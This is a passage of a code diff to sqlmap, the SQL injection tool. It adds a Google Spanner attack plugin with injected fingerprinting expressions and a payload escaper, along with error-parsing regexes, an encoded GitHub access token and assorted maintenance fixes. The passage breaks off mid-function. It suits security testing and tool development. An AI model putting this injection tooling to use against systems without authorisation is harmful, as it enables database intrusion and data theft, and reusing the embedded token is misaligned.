DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES), (DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES), (DBMS.SPANNER, SPANNER_ALIASES))
|
||||
|
||||
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||
REFERER_ALIASES = ("ref", "referer", "referrer")
|
||||
|
|
@ -346,6 +351,7 @@ H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
|
|||
VERTICA_DEFAULT_SCHEMA = "public"
|
||||
MCKOI_DEFAULT_SCHEMA = "APP"
|
||||
CACHE_DEFAULT_SCHEMA = "SQLUser"
|
||||
SPANNER_DEFAULT_SCHEMA = "default"
|
||||
|
||||
# DBMSes where OFFSET mechanism starts from 1
|
||||
PLUS_ONE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.ALTIBASE, DBMS.MSSQL, DBMS.CACHE))
|
||||
|
|
@ -424,7 +430,8 @@ ERROR_PARSING_REGEXES = (
|
|||
r"Code: \d+. DB::Exception: (?P<result>[^<>\n]*)",
|
||||
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
|
||||
r"\[[^\n\]]{1,100}(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)",
|
||||
r"(?P<result>query error: SELECT[^<>]+)"
|
||||
r"(?P<result>query error: SELECT[^<>]+)",
|
||||
r"(?P<result>(?:(?:ORA|PLS)-[0-9]{5}:|SQLCODE[ =:]+-?[0-9]+|SQLSTATE[ =:]+[0-9A-Z]{5}|Dynamic SQL Error|DB2 SQL error:|SAP DBTech JDBC:|SQLiteException:|You have an error in your SQL syntax;|Incorrect syntax near |Unclosed quotation mark after the character string|near \"[^\"]+\": syntax error)[^\n<]*)"
|
||||
)
|
||||
|
||||
# Regular expression used for parsing charset info from meta html headers
|
||||
|
|
@ -704,8 +711,8 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
|||
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||
|
||||
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||
GITHUB_REPORT_OAUTH_TOKEN = "wxqc7vTeW8ohIcX+1wK55Mnql2Ex9cP+2s1dqTr/mjlZJVfLnq24fMAi08v5vRvOmuhVZQdOT/lhIRovWvIJrdECD1ud8VMPWpxY+NmjHoEx+VLK1/vCAUBwJe"
|
||||
# Restricted PAT token for automated crash reporting (last rotation: 2026-04-24)
|
||||
GITHUB_REPORT_PAT_TOKEN = "0EZh0n8npcacTH4oBcdKKWvfZLcdGWx0N5XFHD2xYaQDOkmI9LWaeDvZRZUMDz8l96RDH3+LVsbwGE5zUtaau0kld9VXG20fVbYES3ooFpNv+U9J5OTnaT2OlZcYzk4w5veT+GiHV5cuCngOJ6QgL1+qRpZDX1gzFecXbm2sNfQ2SGjT5McQe1mtxMTN7WsS1fQfPH+RhMUgbnwXJ5YG6EsBNZWOyk0C16QnekrVtuQpK0/ZVvU560uQhoMsP1/FBguBwJe"
|
||||
|
||||
# Flush HashDB threshold number of cached items
|
||||
HASHDB_FLUSH_THRESHOLD_ITEMS = 200
|
||||
|
|
@ -779,7 +786,7 @@ MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
|
|||
# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
|
||||
MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
|
||||
|
||||
# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), identYwaf, htmlParser, etc.)
|
||||
# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), htmlParser, etc.)
|
||||
HEURISTIC_PAGE_SIZE_THRESHOLD = 64 * 1024
|
||||
|
||||
# Maximum (multi-threaded) length of entry in bisection algorithm
|
||||
|
|
@ -840,7 +847,7 @@ RESTAPI_DEFAULT_ADDRESS = "127.0.0.1"
|
|||
RESTAPI_DEFAULT_PORT = 8775
|
||||
|
||||
# Unsupported options by REST-JSON API server
|
||||
RESTAPI_UNSUPPORTED_OPTIONS = ("sqlShell", "wizard")
|
||||
RESTAPI_UNSUPPORTED_OPTIONS = ("sqlShell", "wizard", "evalCode", "alert")
|
||||
|
||||
# Use "Supplementary Private Use Area-A"
|
||||
INVALID_UNICODE_PRIVATE_AREA = False
|
||||
|
|
|
|||
|
|
@ -453,6 +453,14 @@ def _setHashDB():
|
|||
errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex)
|
||||
raise SqlmapFilePathException(errMsg)
|
||||
|
||||
for suffix in ("-shm", "-wal"):
|
||||
leftover = conf.hashDBFile + suffix
|
||||
if os.path.exists(leftover):
|
||||
try:
|
||||
os.remove(leftover)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
conf.hashDB = HashDB(conf.hashDBFile)
|
||||
|
||||
def _resumeHashDBValues():
|
||||
|
|
|
|||
|
|
@ -199,6 +199,8 @@ def vulnTest():
|
|||
os.close(handle)
|
||||
cmd = cmd.replace("<tmpfile>", tmp)
|
||||
|
||||
os.environ["SQLMAP_UNSAFE_EVAL"] = '1'
|
||||
|
||||
output = shellExec(cmd)
|
||||
|
||||
if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output:
|
||||
|
|
|
|||
|
|
@ -276,6 +276,9 @@ def cmdLineParser(argv=None):
|
|||
request.add_argument("--skip-urlencode", dest="skipUrlEncode", action="store_true",
|
||||
help="Skip URL encoding of payload data")
|
||||
|
||||
request.add_argument("--skip-xmlencode", dest="skipXmlEncode", action="store_true",
|
||||
help="Skip safe encoding of payload data for SOAP/XML")
|
||||
|
||||
request.add_argument("--csrf-token", dest="csrfToken",
|
||||
help="Parameter used to hold anti-CSRF token")
|
||||
|
||||
|
|
|
|||
|
|
@ -17,7 +17,7 @@ from thirdparty.six.moves import http_client as _http_client
|
|||
|
||||
abortedFlag = None
|
||||
|
||||
def parseSitemap(url, retVal=None):
|
||||
def parseSitemap(url, retVal=None, visited=None):
|
||||
global abortedFlag
|
||||
|
||||
if retVal is not None:
|
||||
|
|
@ -27,6 +27,12 @@ def parseSitemap(url, retVal=None):
|
|||
if retVal is None:
|
||||
abortedFlag = False
|
||||
retVal = OrderedSet()
|
||||
visited = set()
|
||||
|
||||
if url in visited:
|
||||
return retVal
|
||||
|
||||
visited.add(url)
|
||||
|
||||
try:
|
||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||
|
|
@ -34,18 +40,28 @@ def parseSitemap(url, retVal=None):
|
|||
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||
if abortedFlag:
|
||||
break
|
||||
url = match.group(1).strip()
|
||||
if url.endswith(".xml") and "sitemap" in url.lower():
|
||||
if kb.followSitemapRecursion is None:
|
||||
message = "sitemap recursion detected. Do you want to follow? [y/N] "
|
||||
kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
|
||||
if kb.followSitemapRecursion:
|
||||
parseSitemap(url, retVal)
|
||||
else:
|
||||
retVal.add(url)
|
||||
if content:
|
||||
content = re.sub(r"", "", content, flags=re.DOTALL)
|
||||
|
||||
for match in re.finditer(r"<\w*?loc[^>]*>\s*([^<]+)", content, re.I):
|
||||
if abortedFlag:
|
||||
break
|
||||
|
||||
foundUrl = match.group(1).strip()
|
||||
|
||||
# Basic validation to avoid junk
|
||||
if not foundUrl.startswith("http"):
|
||||
continue
|
||||
|
||||
if foundUrl.endswith(".xml") and "sitemap" in foundUrl.lower():
|
||||
if kb.followSitemapRecursion is None:
|
||||
message = "sitemap recursion detected. Do you want to follow? [y/N] "
|
||||
kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
|
||||
|
||||
if kb.followSitemapRecursion:
|
||||
parseSitemap(foundUrl, retVal, visited)
|
||||
else:
|
||||
retVal.add(foundUrl)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
|
|
|||
|
|
@ -43,7 +43,8 @@ from lib.core.settings import BLOCKED_IP_REGEX
|
|||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
from lib.core.settings import EVENTVALIDATION_REGEX
|
||||
from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD
|
||||
from lib.core.settings import IDENTYWAF_PARSE_LIMIT
|
||||
from lib.core.settings import IDENTYWAF_PARSE_COUNT_LIMIT
|
||||
from lib.core.settings import IDENTYWAF_PARSE_PAGE_LIMIT
|
||||
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
||||
from lib.core.settings import META_CHARSET_REGEX
|
||||
from lib.core.settings import PARSE_HEADERS_LIMIT
|
||||
|
|
@ -395,8 +396,8 @@ def processResponse(page, responseHeaders, code=None, status=None):
|
|||
if msg:
|
||||
logger.warning("parsed DBMS error message: '%s'" % msg.rstrip('.'))
|
||||
|
||||
if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_LIMIT:
|
||||
rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:HEURISTIC_PAGE_SIZE_THRESHOLD])
|
||||
if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_COUNT_LIMIT:
|
||||
rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:IDENTYWAF_PARSE_PAGE_LIMIT] if not kb.checkWafMode else page[:HEURISTIC_PAGE_SIZE_THRESHOLD])
|
||||
|
||||
with kb.locks.identYwaf:
|
||||
identYwaf.non_blind.clear()
|
||||
|
|
|
|||
|
|
@ -176,16 +176,23 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
|
|||
else:
|
||||
key = (hash(seq1), hash(seq2))
|
||||
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
try:
|
||||
seqMatcher.set_seq1(seq1)
|
||||
seqMatcher.set_seq2(seq2)
|
||||
except:
|
||||
seqMatcher.set_seq1(repr(seq1))
|
||||
seqMatcher.set_seq2(repr(seq2))
|
||||
|
||||
if key in kb.cache.comparison:
|
||||
ratio = kb.cache.comparison[key]
|
||||
else:
|
||||
try:
|
||||
ratio = seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio()
|
||||
except (TypeError, MemoryError):
|
||||
ratio = seqMatcher.ratio()
|
||||
try:
|
||||
ratio = seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio()
|
||||
except (TypeError, MemoryError, SystemError):
|
||||
ratio = seqMatcher.ratio()
|
||||
except:
|
||||
ratio = 0.0
|
||||
|
||||
ratio = round(ratio, 3)
|
||||
|
||||
|
|
|
|||
|
|
@ -227,17 +227,18 @@ class Connect(object):
|
|||
|
||||
@staticmethod
|
||||
def _connReadProxy(conn):
|
||||
retVal = b""
|
||||
parts = []
|
||||
|
||||
if not kb.dnsMode and conn:
|
||||
headers = conn.info()
|
||||
if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
|
||||
retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||
if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
|
||||
part = conn.read(MAX_CONNECTION_TOTAL_SIZE)
|
||||
if len(part) == MAX_CONNECTION_TOTAL_SIZE:
|
||||
warnMsg = "large compressed response detected. Disabling compression"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
kb.pageCompress = False
|
||||
raise SqlmapCompressionException
|
||||
parts.append(part)
|
||||
else:
|
||||
while True:
|
||||
if not conn:
|
||||
|
|
@ -252,18 +253,20 @@ class Connect(object):
|
|||
warnMsg = "large response detected. This could take a while"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part)
|
||||
retVal += part
|
||||
parts.append(part)
|
||||
else:
|
||||
retVal += part
|
||||
parts.append(part)
|
||||
break
|
||||
|
||||
if len(retVal) > MAX_CONNECTION_TOTAL_SIZE:
|
||||
if sum(len(_) for _ in parts) > MAX_CONNECTION_TOTAL_SIZE:
|
||||
warnMsg = "too large response detected. Automatically trimming it"
|
||||
singleTimeWarnMessage(warnMsg)
|
||||
break
|
||||
|
||||
if conf.yuge:
|
||||
retVal = YUGE_FACTOR * retVal
|
||||
parts = YUGE_FACTOR * parts
|
||||
|
||||
retVal = b"".join(parts)
|
||||
|
||||
return retVal
|
||||
|
||||
|
|
@ -558,6 +561,10 @@ class Connect(object):
|
|||
else:
|
||||
post = getBytes(post)
|
||||
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/6049
|
||||
if cmdLineOptions.method is None and method == HTTPMETHOD.GET and post == b"":
|
||||
post = None
|
||||
|
||||
if unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST:
|
||||
if kb.place != HTTPMETHOD.POST:
|
||||
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
|
||||
|
|
@ -637,7 +644,7 @@ class Connect(object):
|
|||
conn._read_buffer = conn.read()
|
||||
conn._read_offset = 0
|
||||
|
||||
requestMsg = re.sub(" HTTP/[0-9.]+\r\n", " %s\r\n" % conn.http_version, requestMsg, count=1)
|
||||
requestMsg = re.sub(r" HTTP/[0-9.]+\r\n", " %s\r\n" % conn.http_version, requestMsg, count=1)
|
||||
|
||||
if not multipart:
|
||||
threadData.lastRequestMsg = requestMsg
|
||||
|
|
@ -1113,7 +1120,7 @@ class Connect(object):
|
|||
logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))
|
||||
|
||||
if place == PLACE.CUSTOM_POST and kb.postHint:
|
||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML) and not conf.skipXmlEncode:
|
||||
# payloads in SOAP/XML should have chars > and < replaced
|
||||
# with their HTML encoded counterparts
|
||||
payload = payload.replace("&#", SAFE_HEX_MARKER)
|
||||
|
|
|
|||
|
|
@ -84,7 +84,18 @@ class HTTPSConnection(_http_client.HTTPSConnection):
|
|||
_contexts[protocol].set_ciphers("ALL@SECLEVEL=0")
|
||||
except (ssl.SSLError, AttributeError):
|
||||
pass
|
||||
result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=self.host if re.search(r"\A[\d.]+\Z", self.host or "") is None else None)
|
||||
|
||||
hostname = self.host
|
||||
if conf.host:
|
||||
hostname = conf.host
|
||||
else:
|
||||
for header, value in conf.httpHeaders:
|
||||
if header.lower() == "host":
|
||||
hostname = value
|
||||
break
|
||||
hostname = hostname if re.search(r"\A[\d.]+\Z", hostname or "") is None else None
|
||||
result = _contexts[protocol].wrap_socket(sock, do_handshake_on_connect=True, server_hostname=hostname)
|
||||
|
||||
if result:
|
||||
success = True
|
||||
self.sock = result
|
||||
|
|
|
|||
|
|
@ -278,8 +278,8 @@ def unionUse(expression, unpack=True, dump=False):
|
|||
query = expression.replace(expressionFields, "'%s'||JSON_ARRAYAGG(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join(expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.SQLITE):
|
||||
query = expression.replace(expressionFields, "'%s'||JSON_GROUP_ARRAY(%s)||'%s'" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.PGSQL): # Note: ARRAY_AGG does CSV alike output, thus enclosing start/end inside each item
|
||||
query = expression.replace(expressionFields, "ARRAY_AGG('%s'||%s||'%s')::text" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.PGSQL):
|
||||
query = expression.replace(expressionFields, "STRING_AGG('%s'||%s||'%s','')" % (kb.chars.start, ("||'%s'||" % kb.chars.delimiter).join("COALESCE(%s::text,' ')" % field for field in expressionFieldsList), kb.chars.stop), 1)
|
||||
elif Backend.isDbms(DBMS.MSSQL):
|
||||
query = "'%s'+(%s FOR JSON AUTO, INCLUDE_NULL_VALUES)+'%s'" % (kb.chars.start, expression, kb.chars.stop)
|
||||
output = _oneShotUnionUse(query, False)
|
||||
|
|
|
|||
|
|
@ -23,6 +23,7 @@ import time
|
|||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import openFile
|
||||
from lib.core.common import safeCompareStrings
|
||||
from lib.core.common import saveConfig
|
||||
from lib.core.common import setColor
|
||||
from lib.core.common import unArrayizeValue
|
||||
|
|
@ -293,7 +294,7 @@ def setRestAPILog():
|
|||
|
||||
# Generic functions
|
||||
def is_admin(token):
|
||||
return DataStore.admin_token == token
|
||||
return safeCompareStrings(DataStore.admin_token, token)
|
||||
|
||||
@hook('before_request')
|
||||
def check_authentication():
|
||||
|
|
|
|||
|
|
@ -144,9 +144,13 @@ class HashDB(object):
|
|||
if key:
|
||||
hash_ = HashDB.hashKey(key)
|
||||
with self._cache_lock:
|
||||
self._write_cache[hash_] = self._read_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value)
|
||||
cache_size = len(self._write_cache)
|
||||
time_since_flush = time.time() - self._last_flush_time
|
||||
try:
|
||||
self._write_cache[hash_] = self._read_cache[hash_] = getUnicode(value) if not serialize else serializeObject(value)
|
||||
except RecursionError:
|
||||
pass
|
||||
finally:
|
||||
cache_size = len(self._write_cache)
|
||||
time_since_flush = time.time() - self._last_flush_time
|
||||
|
||||
if cache_size >= HASHDB_FLUSH_THRESHOLD_ITEMS or time_since_flush >= HASHDB_FLUSH_THRESHOLD_TIME:
|
||||
self.flush()
|
||||
|
|
|
|||
|
|
@ -16,7 +16,6 @@ from lib.core.common import getSafeExString
|
|||
from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from plugins.generic.connector import Connector as GenericConnector
|
||||
|
||||
class Connector(GenericConnector):
|
||||
|
|
@ -38,7 +37,7 @@ class Connector(GenericConnector):
|
|||
|
||||
try:
|
||||
# Reference: http://www.daniweb.com/forums/thread248499.html
|
||||
self.connector = kinterbasdb.connect(host=self.hostname.encode(UNICODE_ENCODING), database=self.db.encode(UNICODE_ENCODING), user=self.user.encode(UNICODE_ENCODING), password=self.password.encode(UNICODE_ENCODING), charset="UTF8")
|
||||
self.connector = kinterbasdb.connect(host=self.hostname, database=self.db, user=self.user, password=self.password, charset="UTF8")
|
||||
except kinterbasdb.OperationalError as ex:
|
||||
raise SqlmapConnectionException(getSafeExString(ex))
|
||||
|
||||
|
|
|
|||
30
plugins/dbms/spanner/__init__.py
Normal file
30
plugins/dbms/spanner/__init__.py
Normal file
|
|
@ -0,0 +1,30 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.settings import SPANNER_SYSTEM_DBS
|
||||
from lib.core.unescaper import unescaper
|
||||
|
||||
from plugins.dbms.spanner.enumeration import Enumeration
|
||||
from plugins.dbms.spanner.filesystem import Filesystem
|
||||
from plugins.dbms.spanner.fingerprint import Fingerprint
|
||||
from plugins.dbms.spanner.syntax import Syntax
|
||||
from plugins.dbms.spanner.takeover import Takeover
|
||||
from plugins.generic.misc import Miscellaneous
|
||||
|
||||
class SpannerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
|
||||
"""
|
||||
This class defines Spanner methods
|
||||
"""
|
||||
|
||||
def __init__(self):
|
||||
self.excludeDbsList = SPANNER_SYSTEM_DBS
|
||||
|
||||
for cls in self.__class__.__bases__:
|
||||
cls.__init__(self)
|
||||
|
||||
unescaper[DBMS.SPANNER] = Syntax.escape
|
||||
11
plugins/dbms/spanner/connector.py
Normal file
11
plugins/dbms/spanner/connector.py
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from plugins.generic.connector import Connector as GenericConnector
|
||||
|
||||
class Connector(GenericConnector):
|
||||
pass
|
||||
50
plugins/dbms/spanner/enumeration.py
Normal file
50
plugins/dbms/spanner/enumeration.py
Normal file
|
|
@ -0,0 +1,50 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.data import logger
|
||||
from lib.core.settings import SPANNER_DEFAULT_SCHEMA
|
||||
from plugins.generic.enumeration import Enumeration as GenericEnumeration
|
||||
|
||||
class Enumeration(GenericEnumeration):
|
||||
def getCurrentDb(self):
|
||||
return SPANNER_DEFAULT_SCHEMA
|
||||
|
||||
def getCurrentUser(self):
|
||||
warnMsg = "on Spanner it is not possible to enumerate the current user"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
def isDba(self, user=None):
|
||||
warnMsg = "on Spanner it is not possible to test if current user is DBA"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
def getUsers(self):
|
||||
warnMsg = "on Spanner it is not possible to enumerate the users"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return []
|
||||
|
||||
def getPasswordHashes(self):
|
||||
warnMsg = "on Spanner it is not possible to enumerate the user password hashes"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def getRoles(self, *args, **kwargs):
|
||||
warnMsg = "on Spanner it is not possible to enumerate the user roles"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def getPrivileges(self, *args, **kwargs):
|
||||
warnMsg = "on Spanner it is not possible to enumerate the user privileges"
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return {}
|
||||
|
||||
def getHostname(self):
|
||||
warnMsg = "on Spanner it is not possible to enumerate the hostname"
|
||||
logger.warning(warnMsg)
|
||||
11
plugins/dbms/spanner/filesystem.py
Normal file
11
plugins/dbms/spanner/filesystem.py
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||
|
||||
class Filesystem(GenericFilesystem):
|
||||
pass
|
||||
93
plugins/dbms/spanner/fingerprint.py
Normal file
93
plugins/dbms/spanner/fingerprint.py
Normal file
|
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import Format
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.session import setDbms
|
||||
from lib.core.settings import SPANNER_ALIASES
|
||||
from lib.request import inject
|
||||
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
|
||||
|
||||
class Fingerprint(GenericFingerprint):
|
||||
def __init__(self):
|
||||
GenericFingerprint.__init__(self, DBMS.SPANNER)
|
||||
|
||||
def getFingerprint(self):
|
||||
value = ""
|
||||
wsOsFp = Format.getOs("web server", kb.headersFp)
|
||||
|
||||
if wsOsFp:
|
||||
value += "%s\n" % wsOsFp
|
||||
|
||||
if kb.data.banner:
|
||||
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
|
||||
|
||||
if dbmsOsFp:
|
||||
value += "%s\n" % dbmsOsFp
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += DBMS.SPANNER
|
||||
return value
|
||||
|
||||
actVer = Format.getDbms()
|
||||
blank = " " * 15
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if kb.bannerFp:
|
||||
banVer = kb.bannerFp.get("dbmsVersion")
|
||||
|
||||
if banVer:
|
||||
banVer = Format.getDbms([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
htmlErrorFp = Format.getErrorParsedDBMSes()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
return value
|
||||
|
||||
def checkDbms(self):
|
||||
if not conf.extensiveFp and Backend.isDbmsWithin(SPANNER_ALIASES):
|
||||
setDbms(DBMS.SPANNER)
|
||||
|
||||
self.getBanner()
|
||||
|
||||
return True
|
||||
|
||||
infoMsg = "testing %s" % DBMS.SPANNER
|
||||
logger.info(infoMsg)
|
||||
|
||||
result = inject.checkBooleanExpression("FARM_FINGERPRINT('sqlmap') IS NOT NULL")
|
||||
|
||||
if result:
|
||||
infoMsg = "confirming %s" % DBMS.SPANNER
|
||||
logger.info(infoMsg)
|
||||
|
||||
result = inject.checkBooleanExpression("SAFE_CAST(1 AS INT64)=1")
|
||||
if not result:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.SPANNER
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return False
|
||||
|
||||
setDbms(DBMS.SPANNER)
|
||||
|
||||
self.getBanner()
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DBMS is not %s" % DBMS.SPANNER
|
||||
logger.warning(warnMsg)
|
||||
|
||||
return False
|
||||
26
plugins/dbms/spanner/syntax.py
Normal file
26
plugins/dbms/spanner/syntax.py
Normal file
|
|
@ -0,0 +1,26 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.convert import getOrds
|
||||
from plugins.generic.syntax import Syntax as GenericSyntax
|
||||
|
||||
class Syntax(GenericSyntax):
|
||||
@staticmethod
|
||||
def escape(expression, quote=True):
|
||||
"""
|
||||
Note: Google Standard SQL (Spanner) natively supports converting integer arrays
|
||||
to strings via CODE_POINTS_TO_STRING(). This is much cleaner and shorter
|
||||
than chaining multiple CHR() functions with the || operator.
|
||||
|
||||
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CODE_POINTS_TO_STRING([97, 98, 99, 100, 101, 102, 103, 104]) FROM foobar"
|
||||
True
|
||||
"""
|
||||
|
||||
def escaper(value):
|
||||
return "CODE_POINTS_TO_STRING([%s])" % ", ".join(str(_) for _ in getOrds(value))
|
||||
|
||||
return Syntax._escape(expression, quote, escaper)
|
||||
28
plugins/dbms/spanner/takeover.py
Normal file
28
plugins/dbms/spanner/takeover.py
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||
from plugins.generic.takeover import Takeover as GenericTakeover
|
||||
|
||||
class Takeover(GenericTakeover):
|
||||
def osCmd(self):
|
||||
